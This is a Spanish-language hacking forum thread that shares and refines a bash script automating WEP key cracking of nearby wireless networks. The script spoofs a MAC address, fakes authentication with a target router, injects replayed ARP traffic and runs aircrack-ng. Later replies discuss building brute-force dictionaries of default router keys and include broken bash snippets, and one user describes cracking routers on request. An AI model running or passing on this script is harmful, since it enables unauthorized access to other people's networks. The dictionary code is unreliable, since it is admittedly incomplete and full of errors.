Foro de elhacker.net

Acabo de realizar un script para Hackear las redes wireles como alternativa al airoscript o similares.
El mío es más sencillo, sin llamadas a métodos. Os lo dejo por aquí:

#! /bin/bash
#Script wifihack por snakingmax.
sudo rm -r /tmp/wifihack/
sudo mkdir /tmp/wifihack/
 
# PASO 0 - ACTIVAR EL DRIVER MONITOR:
sudo airmon-ng stop mon0;
sudo airmon-ng start wlan0;
 
# PASO 0.1 - PONERME UNA MAC FALSA. Fabada mola xD
sudo ifconfig mon0 down;
sudo macchanger --mac=00:FA:BA:DA:CA:BE mon0
sudo ifconfig mon0 up;
 
# PASO 1 - LISTAR LAS WIFIS:
xterm -title "Detectando wifis (paralo cuando quieras)." -e sudo airodump-ng mon0 -w "/tmp/wifihack/wifiList";
cat /tmp/wifihack/wifiList-01.kismet.netxml | grep -e 'essid' -e 'BSSID'  -e 'channel' -e 'encryption' > /tmp/wifihack/wifis |
firefox "/tmp/wifihack/wifis";
 
# Un inciso para preguntar:
j="n";
while test $j != "s"
do
clear;
echo Dime el canal del punto de acceso:
read canal
echo Dime la mac del router del objetivo:
read MAC_OBJETIVO
echo Dime el nombre de la wifi del objetivo:
read NOMBRE_AP
echo "¿Estás seguro de que lo has escrito bien (s/n)?"
read j
done
echo Vamos a empezar con el proceso entonces.
 
# PASO 2 - PONER EL AIRODUMP:
xterm -hold  -title "Pinchando la conexión del objetivo" -e sudo airodump-ng -c $canal -w /tmp/wifihack/captura mon0 &
 
# PASO 3 - HACERSE AMIGO DEL ROUTER DEL OBJETIVO:
# e inyectar algo de tráfico cada 5 segundos.
xterm -hold -title "Me estoy haciendo amigo del router del objetivo" -e "for (( i=0; i<=1000; i++ )) do sudo aireplay-ng -1 0 -a $MAC_OBJETIVO -h 00:FA:BA:DA:CA:BE -e $NOMBRE_AP mon0; sleep 5; done" &
 
# PASO 4 - ESNIFAR ROUTER DEL OBJETIVO:
xterm -hold -title "Almacenando los datos de la conexion pinchada" -e sudo aireplay-ng -3 -b $MAC_OBJETIVO -h 00:FA:BA:DA:CA:BE mon0 &
 
# PASO 5 - OBTENER LA CLAVE A PARTIR DE LO QUE ESNIFAMOS:
xterm -hold -title "Pulsa una tecla para intentar crackear" -e "for (( i=0; i<=1000; i++ )) do read a; sudo aircrack-ng -a 1 -s /tmp/wifihack/captura-01.cap; done"
 

Solamente me gustaría que mostrase mejor el archivo: wifiList-01.kismet.netxml
Ese archivo contiene en formato xml la lista de wifis de todos los canales wifi.

Lo que hice es volcar a un archivo usando grep los datos mas interesantes de las wifis que se guardan en bloques que empiezan con el campo <encriptacion> y terminan con el campo <canal>.

Y después abro ese archivo con firefox, si no lo tenéis instalado podéis abrirlo con kate o similares.

Lo interesante sería que el script filtrase también las etiquetas de xml y mostrase los datos algo mas ordenados  :P

Un saludo y gracias a todos por vuestra ayuda.

se nota que eres hacker jaja
oiee me puedes ayudar d un tema
 el tema del deccionario tu sabes algun troco para crear un diccionario
quiero crear un deccionario con 13 digitos hex 0-9 A-F para los redes de wlanXXXXXX y las nuevas wlan_XX y jazztel_XX
y muchas gracias

numDigitos = 13;
contUnidades = 0;
apuntador = 0;
i = "0000000000000";
while (( i -eq "FFFFFFFFFFFFFFF" )) do
if (test (contUnidadades = 15)&(numDigitos=13)) then
     contUnidades=0;
     numDigitos = 0;

     
     if (apuntador=13)
     #apuntar

cat i > diccionario.txt
done

Acabo de hacer el código en bash muy rápido y me falta la linea que actualiza la cadena seguro que van cosas mal pero la idea es la que te escribo aqui debajo. Busca un manual de bash.
Despues solo tendrias que concatenar cada linea a la cadena "WLAN":

numDigitos = 13;
contUnidades = 0;
apuntador = 0;
i = "0000000000000";
#Vemos si llegó al final de nuestra cadena de caracteres.
while (( $i -ne "FFFFFFFFFFFFFFF" )) do
if (test ($contUnidades = 15)&($apuntador=13)) then
     contUnidades=0;
     apuntador = 0;
# Vemos si hay que pasar a un dígito de mayor peso
elif($contUnidades=15) then
    apuntador++;
fi;
 
#FALTA HACER ESTO AQUI->>>>Sumamos uno a la posicion i de nuestra cadena
 
#Almacenar
cat i > diccionario.txt
done
 

ChimoC me ha corregido un detalle y yo he corregido las variables que debían llevar $ delante, seguro que hay mas errores pero viendo por un tuto de bash scripting el código lo puedes terminar sin problemas, cualquier duda posteala por aqui pero googlea antes de preguntar.

Un saludo, espero que te sirva

Dos cosas:

-> Abusas demasiado del comando sudo... a decir verdad es preferible abrir una sesión "permanente" (hasta que cierres el script) con sudo -s en vez de llamar a cada rato a sudo....

->Para postear código bash o shell en el foro lo mejor es usar las etiquetas code así:

[code=bash]
#! /bin/bash
Pon aquí el código
[/code]

De forma que te quedaría así:

#! /bin/bash
echo Hola mundo!

ok Festor, no sabía lo de las tags.

1 saludo.

he logrado a acer un script para generar estos diccionario, pero he tenido una problema aver se me puedes ayudar
mi cd es el wifislax 3.1
y formato del archivo d instalacion es ejemplo.c
ps he modificado unas cosas en jazzteldecrypter.c y me genera un diccionario 0000000000000 FFFFFFFFFFFFF pero mi problema es cuando lo pongo en funcion el archivo que genera llega a 2 gigas y se para y dice k no hay espacio
y lo estoi usando pa que lo guarda en disco duro que tiene 160 y puedo guardar muchos d estos archivos pero lo que se ve que tiene un limite de 2 gigas nha mas
aver s sabes algo pa mi problemia

como lo hago funcionar?? gracias   :-\

Pues lo que puedes hacer es en vez de 1 diccionario 4 distintos o los que sean y luego ya los unes desde fuera del CD. Así trabajas con menos de 2 gigas.

Me refiero a que puedes hacer varios bucles en tu script. Por ejemplo:
000.dic -> desde 000000000 hasta FFFFFFFFFFFFF/4
001.dic -> desde FFFFFFFFFFFFF/4 hasta FFFFFFFFFFFFF/2
002.dic -> desde FFFFFFFFFFFFF/2 hasta FFFFFFFFFFFFF/3
003.dic -> desde FFFFFFFFFFFFF/3 hasta FFFFFFFFFFFFF
Serían 4 partes de un diccionario gigante.
Si no tienes Linux instalado y el Cd no trabaja con mas de 2 gigas en windows desde la consola creo que con type puedes concatenarlos, sino con una version vieja del hacha de esas que no añadian porquería a las partes de los archivos.

Un saludo  ;)

los felicito son buenos en esto  ;-)

El script no esta mal , pero hombre , no engañes al personal  :xD  :xD

Observen:

xterm -hold -title "Almacenando los datos de la conexion pinchada" -e sudo aireplay-ng -3 -b $MAC_OBJETIVO -h 00:FA:BA:DA:CA:BE mon0 &

Hombre de dios , de toda la vida:

aireplay-ng -3 : Lo unico que hace es injeccion por arps contra el router , es un ataque hablando a las claras contra el router .

Y claro el texto como que no es muy fidedigno xDDDDDD

Está bastante currado el script, lo probaré un rato de estos aver como me va. Un inciso, aquí:
Después de cambiar la MAC no deberias alzar otra vez la interfaz? Sino después podria dar problemas... está apagada.

Saludos y gracias por compartir!! :)

buena observación. Hay que levantar otra vez la interfaz.

Tienes razón xD, no tiene que ver el texto con lo que hacen esas líneas. Donde vuelco los datos a un archivo realmente es en:
# PASO 1 - LISTAR LAS WIFIS
Espero que os haya gustado el script.

ummm y porque no lo haces manualmente y asi conoceras el proceso, despues cuando ya sepas como se hace esta bien que utlilizes scripts, pero primero lo que hay que hacer es aprender para poder interpretar lo que estes haciendo.


as provado a modificar ese script, simplemente cambiandolo por el nombre de la trajeta wifi que estas utilizando

Mi script utiliza el siguiente software que debe estar instalado:
– aireplay-ng
– aircrack-ptw
– airmon-ng
– airodump-ng
También debes disponer de la siguiente terminal:
– xterm
Y opcionalmente para utilizar una mac falsa:
– macchanger

Qué debes modificar del script y cómo:


Creo que llega con eso y que no me he colado en ningún sitio.
Un saludo, espero que les sirva a todos los que quieran modificarlo

Me encanta la sencillez de tu programa y lo que hace.

Como una cosa tan sencilla y pequeña puede lograr algo tan grande? XD

Por cierto solo añadir una cosa, que tanto bendecirte el programa y aun no lo e probado, mmm que tal si le añadimos un plugin XD creo que le sentaria bien el wlandecripter. En cuanto lo pruebe mirare haber si me aclaro para añadirle el wlandecripter y te lo envio x aqui.

Ostia! que mañana tengo examen de linux XD 

Saludos! 

Muchas gracias dazoverride, Si alguien puede probarlo y postear como le fue sería mas que interesante.
Lo de los plugins estaría mas que bien algo como:
./plugins/MiPlugin/
Donde dentro de la Carpeta MiPlugin estuviesen dos archivos:
Leeme.txt -> que contiene como se modifica el script para llamar al plugin.
MiPlugin.sh -> que es el plugin propiamente dicho el cual será llamado desde el script.

Sería interesante tambien un plugin que interpretase las tags en xml, seguramente a alguien se le ocurra algo con la instrucción grep...

Saludos y gracias a todos por vuestra colaboración.

Bueno a mi me funciono correctamente solo tuve que cambiar el aircrack-ptw por aircrack-ng. Luego algunos fallos como que no desconecta el modo monitor. Pero vamos llamalo version 0.1 y apañaos XD. A mi me va de lujo para los pesaos de los colegas que estan sacame la contraseña de este router y del otro... les doy el progrma este y que se apañen XD porque realmente yo prefiero hacerlo manualmente XD

Intente insertarle el wlandecripter pero no me acabe de aclarar con el lenguaje XD de todas formas algun dia puede que mande el programita mejorado por mi por privado y haber que te parece. Solo tengo que ponerme un poco al dia con los scripts.

pd: lo tengo bien guardadito en el disco XD

SALUDOS!

 :D hola a todos, me presento soy nuevo en linux (ubuntu 10.4) y más nuevo en redes, es por eso mis preguntas que quizás les parezca de novatos. -este script en que sistema operativo funciona? -como lo ejecuto, lo copio y lo guardo en editor de textos gedit? o se usa en la terminal comando por comando?
la ultima funcionara en esta tarjeta wi? --> tl-wn350gd   ver.1.0
ah y excelente trabajo y dedicación con el script.

En cualquiera que tenga un interprete bash y los comandos/programas que utiliza el script.

Es decir, casi cualquier distribución Linux actual (incluida Ubuntu).


A ver... el fin de un script es precisamente ahorrarse el trabajo de ir comando por comando... xD


Eso depende del chipset que use, siempre depende del chipset (el "núcleo" o "procesador" de la tarjeta wifi)....

Y para ver el chipset la mejor forma es consultar la salida del lspci

Creo que seria mejor utilizar el aircrack-ng o dar la opcion de elegir entre aircrack-ng y aircrack-ptw o incluso dar la opcion de instalarlos, tanto aircrack-ng como macchanger

Solo es una idea, esque quizas el programa sea demasiado sencillo, y aora que ya tienes la base deberias dar mas robustez al programa, tales como el fallo de no remover el mon0. Despues de eso siempre puedes darle mas opciones al programa :D

Saludos y suerte con el programita que desde que lo vi me encantó!

Saludos!

El Script está en fase "muy beta" :-) Lo escribí para no tener que estar introduciendo los comandos cada vez que quisiese testear una red wireless.
En vista del éxito ya corregi lo de levantar la interfaz wifi despues del macchanger y lo modifiqué para que crackee el archivo *.cap con el software aircrack-ng

De todas formas antes de utilizar el script recomiendo una lectura a cualquiera de los tutos en castellano que explican como se utiliza la suite aircrack, de esa manera el script es totalmente legible para cualquiera que sepa como funciona la consola de linux:
http://www.google.es/search?hl=es&q=crack+cracking+wep+wireless+wifi (http://www.google.es/search?hl=es&q=crack+cracking+wep+wireless+wifi)

Unicamente haría falta escribir los siguientes comandos instalar los programas que hacen falta para correr el script:
sudo apt-get install xterm -> Este quizá ya lo tenga instalada tu distro.

justamente estaba colgando el codigo de mi script cuando he visto el tuyo xD
felicidades. está muy logrado, el mio es un poco mas humilde pero estaría bien que le exases un ojo ya que estoy empezando en esto del bash y no me vendria mal algun consejo ;)
http://foro.elhacker.net/wireless_en_linux/script_para_claves_wep-t326937.0.html